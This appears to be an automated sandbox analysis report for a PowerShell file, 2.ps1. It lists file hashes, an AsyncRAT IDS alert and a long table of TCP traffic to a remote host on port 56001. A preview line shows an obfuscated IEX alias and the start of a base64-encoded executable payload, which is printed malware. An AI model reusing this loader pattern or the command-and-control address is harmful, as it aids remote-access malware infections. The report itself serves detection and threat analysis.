SHA-256: | 95D7852899159506762990C7A71812AB4C31651335112C72EDB5F9E517245706 |
SHA-512: | DD262B88B78B5DE092C644D6743A294434C2961DE003B8FEEC2C062647854F76609A654286EA60E15FEF11401F990E84825A78E553C5A6F530D0756E46D83A29 |
Malicious: | false |
Preview: |
File type: | |
Entropy (8bit): | 5.843638776803719 |
TrID: | |
File name: | 2.ps1 |
File size: | 599'249 bytes |
MD5: | 2ef938214c0a5776ac2eac300f845c0c |
SHA1: | 38fccab71265586b09ca4a2d807ec77107e2f4c2 |
SHA256: | 9a42d4f5f028c4f7da66edef20c02bb4c36a1970b1084924bf462057a6aef118 |
SHA512: | 64621150df7e17b331c3433b7c02bfdee621250dbcbbbc48d0575391bd1e61c6d27a1654a2ba53e34d04aecd1ecbaefa3a813162dcdd653793c1a35bb2911651 |
SSDEEP: | 12288:7l1fO0K+jtAyrMKKwLeyKroJFuIIqsRHx9tz3UnuoqbnE:Z8AtNr+wQrWnsRRPgDqbnE |
TLSH: | 58D4E1721303BDCA5BBF1E49E4802A901D9D59B7AB148494BDC907E962EF910DFBCDB0 |
File Content Preview: | .. $t0='IQIQQIIQIQQEX'.replace('IQIQQ','');sal GG $t0;....$OE="qQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDALlEXGcAAAAAAA |
Icon Hash: | 3270d6baae77db44 |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-01-14T17:13:47.590436+0100 | 2035595 | ET MALWARE Generic AsyncRAT Style SSL Cert | 1 | 92.255.57.155 | 56001 | 192.168.2.4 | 49730 | TCP |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Jan 14, 2025 17:13:46.862663984 CET | 49730 | 56001 | 192.168.2.4 | 92.255.57.155 |
Jan 14, 2025 17:13:46.867455959 CET | 56001 | 49730 | 92.255.57.155 | 192.168.2.4 |
Jan 14, 2025 17:13:46.867569923 CET | 49730 | 56001 | 192.168.2.4 | 92.255.57.155 |
Jan 14, 2025 17:13:46.869321108 CET | 49730 | 56001 | 192.168.2.4 | 92.255.57.155 |
Jan 14, 2025 17:13:46.874135971 CET | 56001 | 49730 | 92.255.57.155 | 192.168.2.4 |
Jan 14, 2025 17:13:46.883905888 CET | 49730 | 56001 | 192.168.2.4 | 92.255.57.155 |
Jan 14, 2025 17:13:46.888761044 CET | 56001 | 49730 | 92.255.57.155 | 192.168.2.4 |
Jan 14, 2025 17:13:47.577964067 CET | 56001 | 49730 | 92.255.57.155 | 192.168.2.4 |
Jan 14, 2025 17:13:47.578099012 CET | 56001 | 49730 | 92.255.57.155 | 192.168.2.4 |
Jan 14, 2025 17:13:47.578195095 CET | 49730 | 56001 | 192.168.2.4 | 92.255.57.155 |
Jan 14, 2025 17:13:47.583599091 CET | 49730 | 56001 | 192.168.2.4 | 92.255.57.155 |
Jan 14, 2025 17:13:47.590435982 CET | 56001 | 49730 | 92.255.57.155 | 192.168.2.4 |
Jan 14, 2025 17:13:47.803742886 CET | 56001 | 49730 | 92.255.57.155 | 192.168.2.4 |
Jan 14, 2025 17:13:47.845918894 CET | 49730 | 56001 | 192.168.2.4 | 92.255.57.155 |
Jan 14, 2025 17:13:49.597475052 CET | 49730 | 56001 | 192.168.2.4 | 92.255.57.155 |
Jan 14, 2025 17:13:49.603311062 CET | 56001 | 49730 | 92.255.57.155 | 192.168.2.4 |
Jan 14, 2025 17:13:49.603379965 CET | 49730 | 56001 | 192.168.2.4 | 92.255.57.155 |
Jan 14, 2025 17:13:49.608748913 CET | 56001 | 49730 | 92.255.57.155 | 192.168.2.4 |
Jan 14, 2025 17:14:16.122694969 CET | 49730 | 56001 | 192.168.2.4 | 92.255.57.155 |
Jan 14, 2025 17:14:16.127599001 CET | 56001 | 49730 | 92.255.57.155 | 192.168.2.4 |
Jan 14, 2025 17:14:16.128004074 CET | 49730 | 56001 | 192.168.2.4 | 92.255.57.155 |
Jan 14, 2025 17:14:16.132878065 CET | 56001 | 49730 | 92.255.57.155 | 192.168.2.4 |
Jan 14, 2025 17:14:16.504827023 CET | 56001 | 49730 | 92.255.57.155 | 192.168.2.4 |
Jan 14, 2025 17:14:16.549046993 CET | 49730 | 56001 | 192.168.2.4 | 92.255.57.155 |
Jan 14, 2025 17:14:16.696881056 CET | 56001 | 49730 | 92.255.57.155 | 192.168.2.4 |
Jan 14, 2025 17:14:16.703248024 CET | 49730 | 56001 | 192.168.2.4 | 92.255.57.155 |
Jan 14, 2025 17:14:16.708230972 CET | 56001 | 49730 | 92.255.57.155 | 192.168.2.4 |
Jan 14, 2025 17:14:16.708295107 CET | 49730 | 56001 | 192.168.2.4 | 92.255.57.155 |
Jan 14, 2025 17:14:16.713156939 CET | 56001 | 49730 | 92.255.57.155 | 192.168.2.4 |
Jan 14, 2025 17:14:18.577164888 CET | 56001 | 49730 | 92.255.57.155 | 192.168.2.4 |
Jan 14, 2025 17:14:18.627147913 CET | 49730 | 56001 | 192.168.2.4 | 92.255.57.155 |
Jan 14, 2025 17:14:18.744447947 CET | 56001 | 49730 | 92.255.57.155 | 192.168.2.4 |
Jan 14, 2025 17:14:18.799051046 CET | 49730 | 56001 | 192.168.2.4 | 92.255.57.155 |
Jan 14, 2025 17:14:43.127705097 CET | 49730 | 56001 | 192.168.2.4 | 92.255.57.155 |
Jan 14, 2025 17:14:43.132477999 CET | 56001 | 49730 | 92.255.57.155 | 192.168.2.4 |
Jan 14, 2025 17:14:43.132519960 CET | 49730 | 56001 | 192.168.2.4 | 92.255.57.155 |
Jan 14, 2025 17:14:43.137412071 CET | 56001 | 49730 | 92.255.57.155 | 192.168.2.4 |
Jan 14, 2025 17:14:43.534826994 CET | 56001 | 49730 | 92.255.57.155 | 192.168.2.4 |
Jan 14, 2025 17:14:43.580298901 CET | 49730 | 56001 | 192.168.2.4 | 92.255.57.155 |
Jan 14, 2025 17:14:43.681735039 CET | 56001 | 49730 | 92.255.57.155 | 192.168.2.4 |
Jan 14, 2025 17:14:43.683670998 CET | 49730 | 56001 | 192.168.2.4 | 92.255.57.155 |
Jan 14, 2025 17:14:43.688429117 CET | 56001 | 49730 | 92.255.57.155 | 192.168.2.4 |
Jan 14, 2025 17:14:43.688488007 CET | 49730 | 56001 | 192.168.2.4 | 92.255.57.155 |
Jan 14, 2025 17:14:43.693295002 CET | 56001 | 49730 | 92.255.57.155 | 192.168.2.4 |
Jan 14, 2025 17:14:49.611414909 CET | 56001 | 49730 | 92.255.57.155 | 192.168.2.4 |
Jan 14, 2025 17:14:49.658440113 CET | 49730 | 56001 | 192.168.2.4 | 92.255.57.155 |
Jan 14, 2025 17:14:49.775530100 CET | 56001 | 49730 | 92.255.57.155 | 192.168.2.4 |
Jan 14, 2025 17:14:49.830298901 CET | 49730 | 56001 | 192.168.2.4 | 92.255.57.155 |
Jan 14, 2025 17:15:10.143410921 CET | 49730 | 56001 | 192.168.2.4 | 92.255.57.155 |
Jan 14, 2025 17:15:10.148222923 CET | 56001 | 49730 | 92.255.57.155 | 192.168.2.4 |
Jan 14, 2025 17:15:10.148286104 CET | 49730 | 56001 | 192.168.2.4 | 92.255.57.155 |
Jan 14, 2025 17:15:10.153076887 CET | 56001 | 49730 | 92.255.57.155 | 192.168.2.4 |
Jan 14, 2025 17:15:10.541091919 CET | 56001 | 49730 | 92.255.57.155 | 192.168.2.4 |
Jan 14, 2025 17:15:10.580410004 CET | 49730 | 56001 | 192.168.2.4 | 92.255.57.155 |
Jan 14, 2025 17:15:10.713860989 CET | 56001 | 49730 | 92.255.57.155 | 192.168.2.4 |
Jan 14, 2025 17:15:10.715909004 CET | 49730 | 56001 | 192.168.2.4 | 92.255.57.155 |
Jan 14, 2025 17:15:10.721596956 CET | 56001 | 49730 | 92.255.57.155 | 192.168.2.4 |
Jan 14, 2025 17:15:10.721647024 CET | 49730 | 56001 | 192.168.2.4 | 92.255.57.155 |
Jan 14, 2025 17:15:10.727170944 CET | 56001 | 49730 | 92.255.57.155 | 192.168.2.4 |
Jan 14, 2025 17:15:31.112050056 CET | 49730 | 56001 | 192.168.2.4 | 92.255.57.155 |
Jan 14, 2025 17:15:31.117052078 CET | 56001 | 49730 | 92.255.57.155 | 192.168.2.4 |
Jan 14, 2025 17:15:31.117152929 CET | 49730 | 56001 | 192.168.2.4 | 92.255.57.155 |
Jan 14, 2025 17:15:31.121929884 CET | 56001 | 49730 | 92.255.57.155 | 192.168.2.4 |
Jan 14, 2025 17:15:31.497056961 CET | 56001 | 49730 | 92.255.57.155 | 192.168.2.4 |
Jan 14, 2025 17:15:31.661757946 CET | 49730 | 56001 | 192.168.2.4 | 92.255.57.155 |
Jan 14, 2025 17:15:31.667335987 CET | 56001 | 49730 | 92.255.57.155 | 192.168.2.4 |
Jan 14, 2025 17:15:31.678112984 CET | 49730 | 56001 | 192.168.2.4 | 92.255.57.155 |
Jan 14, 2025 17:15:31.682897091 CET | 56001 | 49730 | 92.255.57.155 | 192.168.2.4 |
Jan 14, 2025 17:15:31.682943106 CET | 49730 | 56001 | 192.168.2.4 | 92.255.57.155 |
Jan 14, 2025 17:15:31.687743902 CET | 56001 | 49730 | 92.255.57.155 | 192.168.2.4 |
Jan 14, 2025 17:15:33.987091064 CET | 49730 | 56001 | 192.168.2.4 | 92.255.57.155 |
Jan 14, 2025 17:15:33.992749929 CET | 56001 | 49730 | 92.255.57.155 | 192.168.2.4 |
Jan 14, 2025 17:15:33.992799044 CET | 49730 | 56001 | 192.168.2.4 | 92.255.57.155 |
Jan 14, 2025 17:15:33.998260021 CET | 56001 | 49730 | 92.255.57.155 | 192.168.2.4 |
Jan 14, 2025 17:15:34.252907038 CET | 49730 | 56001 | 192.168.2.4 | 92.255.57.155 |
Jan 14, 2025 17:15:34.259749889 CET | 56001 | 49730 | 92.255.57.155 | 192.168.2.4 |
Jan 14, 2025 17:15:34.259803057 CET | 49730 | 56001 | 192.168.2.4 | 92.255.57.155 |
Jan 14, 2025 17:15:34.265777111 CET | 56001 | 49730 | 92.255.57.155 | 192.168.2.4 |
Jan 14, 2025 17:15:34.315097094 CET | 49730 | 56001 | 192.168.2.4 | 92.255.57.155 |
Jan 14, 2025 17:15:34.319921017 CET | 56001 | 49730 | 92.255.57.155 | 192.168.2.4 |
Jan 14, 2025 17:15:34.320219040 CET | 49730 | 56001 | 192.168.2.4 | 92.255.57.155 |
Jan 14, 2025 17:15:34.325022936 CET | 56001 | 49730 | 92.255.57.155 | 192.168.2.4 |
Jan 14, 2025 17:15:34.376759052 CET | 56001 | 49730 | 92.255.57.155 | 192.168.2.4 |
Jan 14, 2025 17:15:34.486629963 CET | 49730 | 56001 | 192.168.2.4 | 92.255.57.155 |
Jan 14, 2025 17:15:34.508451939 CET | 56001 | 49730 | 92.255.57.155 | 192.168.2.4 |
Jan 14, 2025 17:15:34.513180017 CET | 49730 | 56001 | 192.168.2.4 | 92.255.57.155 |
Jan 14, 2025 17:15:34.518232107 CET | 56001 | 49730 | 92.255.57.155 | 192.168.2.4 |
Jan 14, 2025 17:15:34.519273996 CET | 49730 | 56001 | 192.168.2.4 | 92.255.57.155 |
Jan 14, 2025 17:15:34.524154902 CET | 56001 | 49730 | 92.255.57.155 | 192.168.2.4 |
Jan 14, 2025 17:15:34.627671003 CET | 56001 | 49730 | 92.255.57.155 | 192.168.2.4 |
Jan 14, 2025 17:15:34.637335062 CET | 49730 | 56001 | 192.168.2.4 | 92.255.57.155 |
Jan 14, 2025 17:15:34.642115116 CET | 56001 | 49730 | 92.255.57.155 | 192.168.2.4 |
Jan 14, 2025 17:15:34.642230988 CET | 49730 | 56001 | 192.168.2.4 | 92.255.57.155 |
Jan 14, 2025 17:15:34.647063971 CET | 56001 | 49730 | 92.255.57.155 | 192.168.2.4 |
Jan 14, 2025 17:15:34.749299049 CET | 56001 | 49730 | 92.255.57.155 | 192.168.2.4 |
Jan 14, 2025 17:15:34.751957893 CET | 49730 | 56001 | 192.168.2.4 | 92.255.57.155 |
Jan 14, 2025 17:15:34.757719040 CET | 56001 | 49730 | 92.255.57.155 | 192.168.2.4 |
Jan 14, 2025 17:15:34.759443998 CET | 49730 | 56001 | 192.168.2.4 | 92.255.57.155 |
Jan 14, 2025 17:15:34.764256954 CET | 56001 | 49730 | 92.255.57.155 | 192.168.2.4 |
Jan 14, 2025 17:15:37.284600973 CET | 49730 | 56001 | 192.168.2.4 | 92.255.57.155 |
Jan 14, 2025 17:15:37.324481964 CET | 56001 | 49730 | 92.255.57.155 | 192.168.2.4 |
Jan 14, 2025 17:15:37.324584961 CET | 49730 | 56001 | 192.168.2.4 | 92.255.57.155 |
Jan 14, 2025 17:15:37.329391956 CET | 56001 | 49730 | 92.255.57.155 | 192.168.2.4 |
Jan 14, 2025 17:15:37.711898088 CET | 56001 | 49730 | 92.255.57.155 | 192.168.2.4 |
Jan 14, 2025 17:15:37.841944933 CET | 49730 | 56001 | 192.168.2.4 | 92.255.57.155 |
Jan 14, 2025 17:15:37.885998011 CET | 56001 | 49730 | 92.255.57.155 | 192.168.2.4 |
Jan 14, 2025 17:15:37.889033079 CET | 49730 | 56001 | 192.168.2.4 | 92.255.57.155 |
Jan 14, 2025 17:15:37.893965006 CET | 56001 | 49730 | 92.255.57.155 | 192.168.2.4 |
Jan 14, 2025 17:15:37.894016027 CET | 49730 | 56001 | 192.168.2.4 | 92.255.57.155 |
Jan 14, 2025 17:15:37.898853064 CET | 56001 | 49730 | 92.255.57.155 | 192.168.2.4 |
Jan 14, 2025 17:16:04.299886942 CET | 49730 | 56001 | 192.168.2.4 | 92.255.57.155 |
Jan 14, 2025 17:16:04.304774046 CET | 56001 | 49730 | 92.255.57.155 | 192.168.2.4 |
Jan 14, 2025 17:16:04.304867029 CET | 49730 | 56001 | 192.168.2.4 | 92.255.57.155 |
Jan 14, 2025 17:16:04.309787035 CET | 56001 | 49730 | 92.255.57.155 | 192.168.2.4 |
Jan 14, 2025 17:16:04.687388897 CET | 56001 | 49730 | 92.255.57.155 | 192.168.2.4 |
Jan 14, 2025 17:16:04.736953974 CET | 49730 | 56001 | 192.168.2.4 | 92.255.57.155 |
Jan 14, 2025 17:16:04.854970932 CET | 56001 | 49730 | 92.255.57.155 | 192.168.2.4 |
Jan 14, 2025 17:16:04.858222008 CET | 49730 | 56001 | 192.168.2.4 | 92.255.57.155 |
Jan 14, 2025 17:16:04.863066912 CET | 56001 | 49730 | 92.255.57.155 | 192.168.2.4 |
Jan 14, 2025 17:16:04.863338947 CET | 49730 | 56001 | 192.168.2.4 | 92.255.57.155 |
Jan 14, 2025 17:16:04.869323015 CET | 56001 | 49730 | 92.255.57.155 | 192.168.2.4 |
Jan 14, 2025 17:16:15.924629927 CET | 49730 | 56001 | 192.168.2.4 | 92.255.57.155 |
Jan 14, 2025 17:16:15.929470062 CET | 56001 | 49730 | 92.255.57.155 | 192.168.2.4 |
Jan 14, 2025 17:16:15.929560900 CET | 49730 | 56001 | 192.168.2.4 | 92.255.57.155 |
Jan 14, 2025 17:16:15.934382915 CET | 56001 | 49730 | 92.255.57.155 | 192.168.2.4 |
Jan 14, 2025 17:16:16.316189051 CET | 56001 | 49730 | 92.255.57.155 | 192.168.2.4 |
Jan 14, 2025 17:16:16.480613947 CET | 56001 | 49730 | 92.255.57.155 | 192.168.2.4 |
Jan 14, 2025 17:16:16.482323885 CET | 49730 | 56001 | 192.168.2.4 | 92.255.57.155 |
Jan 14, 2025 17:16:16.485917091 CET | 49730 | 56001 | 192.168.2.4 | 92.255.57.155 |
Jan 14, 2025 17:16:16.491329908 CET | 56001 | 49730 | 92.255.57.155 | 192.168.2.4 |
Jan 14, 2025 17:16:16.491399050 CET | 49730 | 56001 | 192.168.2.4 | 92.255.57.155 |
Jan 14, 2025 17:16:16.496150970 CET | 56001 | 49730 | 92.255.57.155 | 192.168.2.4 |
Jan 14, 2025 17:16:25.174613953 CET | 49730 | 56001 | 192.168.2.4 | 92.255.57.155 |
Jan 14, 2025 17:16:25.179542065 CET | 56001 | 49730 | 92.255.57.155 | 192.168.2.4 |
Jan 14, 2025 17:16:25.179630041 CET | 49730 | 56001 | 192.168.2.4 | 92.255.57.155 |
Jan 14, 2025 17:16:25.184396029 CET | 56001 | 49730 | 92.255.57.155 | 192.168.2.4 |
Jan 14, 2025 17:16:25.568942070 CET | 56001 | 49730 | 92.255.57.155 | 192.168.2.4 |
Jan 14, 2025 17:16:25.611696005 CET | 49730 | 56001 | 192.168.2.4 | 92.255.57.155 |
Jan 14, 2025 17:16:25.731081009 CET | 56001 | 49730 | 92.255.57.155 | 192.168.2.4 |
Jan 14, 2025 17:16:25.733475924 CET | 49730 | 56001 | 192.168.2.4 | 92.255.57.155 |
Jan 14, 2025 17:16:25.738276005 CET | 56001 | 49730 | 92.255.57.155 | 192.168.2.4 |
Jan 14, 2025 17:16:25.738377094 CET | 49730 | 56001 | 192.168.2.4 | 92.255.57.155 |
Jan 14, 2025 17:16:25.743273020 CET | 56001 | 49730 | 92.255.57.155 | 192.168.2.4 |
Jan 14, 2025 17:16:32.143496990 CET | 49730 | 56001 | 192.168.2.4 | 92.255.57.155 |
Jan 14, 2025 17:16:32.148252964 CET | 56001 | 49730 | 92.255.57.155 | 192.168.2.4 |
Jan 14, 2025 17:16:32.148426056 CET | 49730 | 56001 | 192.168.2.4 | 92.255.57.155 |
Jan 14, 2025 17:16:32.153202057 CET | 56001 | 49730 | 92.255.57.155 | 192.168.2.4 |
Jan 14, 2025 17:16:32.543914080 CET | 56001 | 49730 | 92.255.57.155 | 192.168.2.4 |
Jan 14, 2025 17:16:32.596290112 CET | 49730 | 56001 | 192.168.2.4 | 92.255.57.155 |
Jan 14, 2025 17:16:32.699320078 CET | 56001 | 49730 | 92.255.57.155 | 192.168.2.4 |
Jan 14, 2025 17:16:32.733460903 CET | 49730 | 56001 | 192.168.2.4 | 92.255.57.155 |
Jan 14, 2025 17:16:32.738419056 CET | 56001 | 49730 | 92.255.57.155 | 192.168.2.4 |
Jan 14, 2025 17:16:32.738580942 CET | 49730 | 56001 | 192.168.2.4 | 92.255.57.155 |
Jan 14, 2025 17:16:32.743307114 CET | 56001 | 49730 | 92.255.57.155 | 192.168.2.4 |
Jan 14, 2025 17:16:46.783973932 CET | 49730 | 56001 | 192.168.2.4 | 92.255.57.155 |
Jan 14, 2025 17:16:46.788825035 CET | 56001 | 49730 | 92.255.57.155 | 192.168.2.4 |
Jan 14, 2025 17:16:46.789241076 CET | 49730 | 56001 | 192.168.2.4 | 92.255.57.155 |
Jan 14, 2025 17:16:46.794101000 CET | 56001 | 49730 | 92.255.57.155 | 192.168.2.4 |
Jan 14, 2025 17:16:47.165436029 CET | 56001 | 49730 | 92.255.57.155 | 192.168.2.4 |
Jan 14, 2025 17:16:47.340243101 CET | 56001 | 49730 | 92.255.57.155 | 192.168.2.4 |
Jan 14, 2025 17:16:47.341763020 CET | 49730 | 56001 | 192.168.2.4 | 92.255.57.155 |
Jan 14, 2025 17:16:47.397088051 CET | 49730 | 56001 | 192.168.2.4 | 92.255.57.155 |
Jan 14, 2025 17:16:47.401901007 CET | 56001 | 49730 | 92.255.57.155 | 192.168.2.4 |
Jan 14, 2025 17:16:47.402142048 CET | 49730 | 56001 | 192.168.2.4 | 92.255.57.155 |
Jan 14, 2025 17:16:47.406924009 CET | 56001 | 49730 | 92.255.57.155 | 192.168.2.4 |
Jan 14, 2025 17:16:53.596548080 CET | 49730 | 56001 | 192.168.2.4 | 92.255.57.155 |
Jan 14, 2025 17:16:53.602106094 CET | 56001 | 49730 | 92.255.57.155 | 192.168.2.4 |
Jan 14, 2025 17:16:53.602204084 CET | 49730 | 56001 | 192.168.2.4 | 92.255.57.155 |
Jan 14, 2025 17:16:53.607584953 CET | 56001 | 49730 | 92.255.57.155 | 192.168.2.4 |
Jan 14, 2025 17:16:53.978617907 CET | 56001 | 49730 | 92.255.57.155 | 192.168.2.4 |
Jan 14, 2025 17:16:54.153057098 CET | 56001 | 49730 | 92.255.57.155 | 192.168.2.4 |
Jan 14, 2025 17:16:54.153209925 CET | 49730 | 56001 | 192.168.2.4 | 92.255.57.155 |
Jan 14, 2025 17:16:54.155464888 CET | 49730 | 56001 | 192.168.2.4 | 92.255.57.155 |
Jan 14, 2025 17:16:54.160387039 CET | 56001 | 49730 | 92.255.57.155 | 192.168.2.4 |
Jan 14, 2025 17:16:54.160464048 CET | 49730 | 56001 | 192.168.2.4 | 92.255.57.155 |
Jan 14, 2025 17:16:54.165304899 CET | 56001 | 49730 | 92.255.57.155 | 192.168.2.4 |
Jan 14, 2025 17:16:57.707253933 CET | 49730 | 56001 | 192.168.2.4 | 92.255.57.155 |
Jan 14, 2025 17:16:57.712191105 CET | 56001 | 49730 | 92.255.57.155 | 192.168.2.4 |
Jan 14, 2025 17:16:57.716645002 CET | 49730 | 56001 | 192.168.2.4 | 92.255.57.155 |
Jan 14, 2025 17:16:57.721518993 CET | 56001 | 49730 | 92.255.57.155 | 192.168.2.4 |
Jan 14, 2025 17:16:58.090269089 CET | 56001 | 49730 | 92.255.57.155 | 192.168.2.4 |
Jan 14, 2025 17:16:58.190068007 CET | 49730 | 56001 | 192.168.2.4 | 92.255.57.155 |
Jan 14, 2025 17:16:58.262355089 CET | 56001 | 49730 | 92.255.57.155 | 192.168.2.4 |
Jan 14, 2025 17:16:58.278804064 CET | 49730 | 56001 | 192.168.2.4 | 92.255.57.155 |
Jan 14, 2025 17:16:58.283734083 CET | 56001 | 49730 | 92.255.57.155 | 192.168.2.4 |
Jan 14, 2025 17:16:58.287333012 CET | 49730 | 56001 | 192.168.2.4 | 92.255.57.155 |
Jan 14, 2025 17:16:58.292253971 CET | 56001 | 49730 | 92.255.57.155 | 192.168.2.4 |
Jan 14, 2025 17:17:11.940243006 CET | 49730 | 56001 | 192.168.2.4 | 92.255.57.155 |
Jan 14, 2025 17:17:11.945074081 CET | 56001 | 49730 | 92.255.57.155 | 192.168.2.4 |
Jan 14, 2025 17:17:11.947794914 CET | 49730 | 56001 | 192.168.2.4 | 92.255.57.155 |
Jan 14, 2025 17:17:11.952584982 CET | 56001 | 49730 | 92.255.57.155 | 192.168.2.4 |
Jan 14, 2025 17:17:12.332926989 CET | 56001 | 49730 | 92.255.57.155 | 192.168.2.4 |
Jan 14, 2025 17:17:12.488868952 CET | 49730 | 56001 | 192.168.2.4 | 92.255.57.155 |
Jan 14, 2025 17:17:12.496937990 CET | 56001 | 49730 | 92.255.57.155 | 192.168.2.4 |
Jan 14, 2025 17:17:12.502268076 CET | 49730 | 56001 | 192.168.2.4 | 92.255.57.155 |
Jan 14, 2025 17:17:12.507136106 CET | 56001 | 49730 | 92.255.57.155 | 192.168.2.4 |
Jan 14, 2025 17:17:12.509881020 CET | 49730 | 56001 | 192.168.2.4 | 92.255.57.155 |
Jan 14, 2025 17:17:12.514724016 CET | 56001 | 49730 | 92.255.57.155 | 192.168.2.4 |
Jan 14, 2025 17:17:24.411298037 CET | 49730 | 56001 | 192.168.2.4 | 92.255.57.155 |
Jan 14, 2025 17:17:24.416400909 CET | 56001 | 49730 | 92.255.57.155 | 192.168.2.4 |
Jan 14, 2025 17:17:24.416804075 CET | 49730 | 56001 | 192.168.2.4 | 92.255.57.155 |
Jan 14, 2025 17:17:24.421869993 CET | 56001 | 49730 | 92.255.57.155 | 192.168.2.4 |
Jan 14, 2025 17:17:24.793078899 CET | 56001 | 49730 | 92.255.57.155 | 192.168.2.4 |
Jan 14, 2025 17:17:24.933659077 CET | 49730 | 56001 | 192.168.2.4 | 92.255.57.155 |
Jan 14, 2025 17:17:24.965892076 CET | 56001 | 49730 | 92.255.57.155 | 192.168.2.4 |
Jan 14, 2025 17:17:24.968704939 CET | 49730 | 56001 | 192.168.2.4 | 92.255.57.155 |
Jan 14, 2025 17:17:24.973602057 CET | 56001 | 49730 | 92.255.57.155 | 192.168.2.4 |
Jan 14, 2025 17:17:24.973653078 CET | 49730 | 56001 | 192.168.2.4 | 92.255.57.155 |
Jan 14, 2025 17:17:24.978502035 CET | 56001 | 49730 | 92.255.57.155 | 192.168.2.4 |
Jan 14, 2025 17:17:26.284739017 CET | 49730 | 56001 | 192.168.2.4 | 92.255.57.155 |
Jan 14, 2025 17:17:26.289643049 CET | 56001 | 49730 | 92.255.57.155 | 192.168.2.4 |
Jan 14, 2025 17:17:26.297859907 CET | 49730 | 56001 | 192.168.2.4 | 92.255.57.155 |
Jan 14, 2025 17:17:26.302644968 CET | 56001 | 49730 | 92.255.57.155 | 192.168.2.4 |
Jan 14, 2025 17:17:26.659149885 CET | 49730 | 56001 | 192.168.2.4 | 92.255.57.155 |
Jan 14, 2025 17:17:26.664058924 CET | 56001 | 49730 | 92.255.57.155 | 192.168.2.4 |
Jan 14, 2025 17:17:26.664216042 CET | 49730 | 56001 | 192.168.2.4 | 92.255.57.155 |
Jan 14, 2025 17:17:26.669142962 CET | 56001 | 49730 | 92.255.57.155 | 192.168.2.4 |
Jan 14, 2025 17:17:26.672708035 CET | 56001 | 49730 | 92.255.57.155 | 192.168.2.4 |
Jan 14, 2025 17:17:26.752398014 CET | 49730 | 56001 | 192.168.2.4 | 92.255.57.155 |
Jan 14, 2025 17:17:26.840936899 CET | 56001 | 49730 | 92.255.57.155 | 192.168.2.4 |
Jan 14, 2025 17:17:26.843497992 CET | 49730 | 56001 | 192.168.2.4 | 92.255.57.155 |
Jan 14, 2025 17:17:26.891719103 CET | 56001 | 49730 | 92.255.57.155 | 192.168.2.4 |
Jan 14, 2025 17:17:26.891779900 CET | 49730 | 56001 | 192.168.2.4 | 92.255.57.155 |
Jan 14, 2025 17:17:26.896714926 CET | 56001 | 49730 | 92.255.57.155 | 192.168.2.4 |
Jan 14, 2025 17:17:26.963198900 CET | 56001 | 49730 | 92.255.57.155 | 192.168.2.4 |
Jan 14, 2025 17:17:27.032453060 CET | 49730 | 56001 | 192.168.2.4 | 92.255.57.155 |
Jan 14, 2025 17:17:27.094254017 CET | 56001 | 49730 | 92.255.57.155 | 192.168.2.4 |
Jan 14, 2025 17:17:27.096782923 CET | 49730 | 56001 | 192.168.2.4 | 92.255.57.155 |
Jan 14, 2025 17:17:27.101679087 CET | 56001 | 49730 | 92.255.57.155 | 192.168.2.4 |
Jan 14, 2025 17:17:27.101723909 CET | 49730 | 56001 | 192.168.2.4 | 92.255.57.155 |
Jan 14, 2025 17:17:27.106585979 CET | 56001 | 49730 | 92.255.57.155 | 192.168.2.4 |
Jan 14, 2025 17:17:31.680769920 CET | 49730 | 56001 | 192.168.2.4 | 92.255.57.155 |
Jan 14, 2025 17:17:31.685681105 CET | 56001 | 49730 | 92.255.57.155 | 192.168.2.4 |
Jan 14, 2025 17:17:31.688265085 CET | 49730 | 56001 | 192.168.2.4 | 92.255.57.155 |
Jan 14, 2025 17:17:31.693130016 CET | 56001 | 49730 | 92.255.57.155 | 192.168.2.4 |
Jan 14, 2025 17:17:32.067687035 CET | 56001 | 49730 | 92.255.57.155 | 192.168.2.4 |
Jan 14, 2025 17:17:32.158767939 CET | 49730 | 56001 | 192.168.2.4 | 92.255.57.155 |
Jan 14, 2025 17:17:32.231712103 CET | 56001 | 49730 | 92.255.57.155 | 192.168.2.4 |
Jan 14, 2025 17:17:32.237354994 CET | 49730 | 56001 | 192.168.2.4 | 92.255.57.155 |
Jan 14, 2025 17:17:32.242240906 CET | 56001 | 49730 | 92.255.57.155 | 192.168.2.4 |
Jan 14, 2025 17:17:32.243350983 CET | 49730 | 56001 | 192.168.2.4 | 92.255.57.155 |
Jan 14, 2025 17:17:32.248166084 CET | 56001 | 49730 | 92.255.57.155 | 192.168.2.4 |
Jan 14, 2025 17:17:35.221690893 CET | 49730 | 56001 | 192.168.2.4 | 92.255.57.155 |
Jan 14, 2025 17:17:35.226557970 CET | 56001 | 49730 | 92.255.57.155 | 192.168.2.4 |
Jan 14, 2025 17:17:35.226623058 CET | 49730 | 56001 | 192.168.2.4 | 92.255.57.155 |
Jan 14, 2025 17:17:35.231394053 CET | 56001 | 49730 | 92.255.57.155 | 192.168.2.4 |
Jan 14, 2025 17:17:35.601214886 CET | 56001 | 49730 | 92.255.57.155 | 192.168.2.4 |
Jan 14, 2025 17:17:35.658664942 CET | 49730 | 56001 | 192.168.2.4 | 92.255.57.155 |
Jan 14, 2025 17:17:35.763020992 CET | 56001 | 49730 | 92.255.57.155 | 192.168.2.4 |
Jan 14, 2025 17:17:35.769088984 CET | 49730 | 56001 | 192.168.2.4 | 92.255.57.155 |
Jan 14, 2025 17:17:35.773865938 CET | 56001 | 49730 | 92.255.57.155 | 192.168.2.4 |
Jan 14, 2025 17:17:35.774053097 CET | 49730 | 56001 | 192.168.2.4 | 92.255.57.155 |
Jan 14, 2025 17:17:35.778769016 CET | 56001 | 49730 | 92.255.57.155 | 192.168.2.4 |
Jan 14, 2025 17:17:44.195456028 CET | 49730 | 56001 | 192.168.2.4 | 92.255.57.155 |
Jan 14, 2025 17:17:44.200357914 CET | 56001 | 49730 | 92.255.57.155 | 192.168.2.4 |
Jan 14, 2025 17:17:44.200403929 CET | 49730 | 56001 | 192.168.2.4 | 92.255.57.155 |
Jan 14, 2025 17:17:44.205190897 CET | 56001 | 49730 | 92.255.57.155 | 192.168.2.4 |
Jan 14, 2025 17:17:44.586334944 CET | 56001 | 49730 | 92.255.57.155 | 192.168.2.4 |
